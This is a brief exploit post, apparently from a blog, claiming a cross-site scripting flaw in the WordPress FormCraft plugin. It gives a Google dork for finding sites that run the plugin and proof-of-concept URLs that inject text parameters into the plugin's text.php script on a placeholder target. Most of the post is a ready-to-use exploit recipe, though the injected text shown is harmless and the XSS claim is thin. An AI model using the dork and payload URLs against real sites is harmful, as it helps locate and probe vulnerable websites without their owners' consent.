Hello Fazlast Back, Share Tutorials Again :)
# Exploit Title: WordPress Plugins FormCraft - Cross-Site Scripting Image Type
# Google Dork: inurl:/wp-content/plugins/formcraft/
# Date: 15 December 2017 (Indonesia)
# Exploit Author: AlHikam0x
# Tested on: Ubuntu
Proof of Concept
Check blank page : https://web-target/wp-content/plugins/formcraft/php/text.php
Exploit XSS : ?text=XSS Vulnerability&bg=white&text_color=black
View image : https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzaR6S0a7ngfAtUUsPdJyt2lslW7Zfh7Z2KLB21RZK9JTs0Y084N5Ibn9vdeDTdKjva0PzSgnUWMJscD-ymoLMspsKVnVHMvWkSADGHg8uE2IqKJSv-eY6ra5odDjAP4JuDKivwfIlL3o/s1600/Screenshot+from+2017-12-15+03-43-22.png
Finish : https://web-target/wp-content/plugins/formcraft/php/text.php?text=qh3xu&bg=white&text_color=black
Thank's :)
EmoticonEmoticon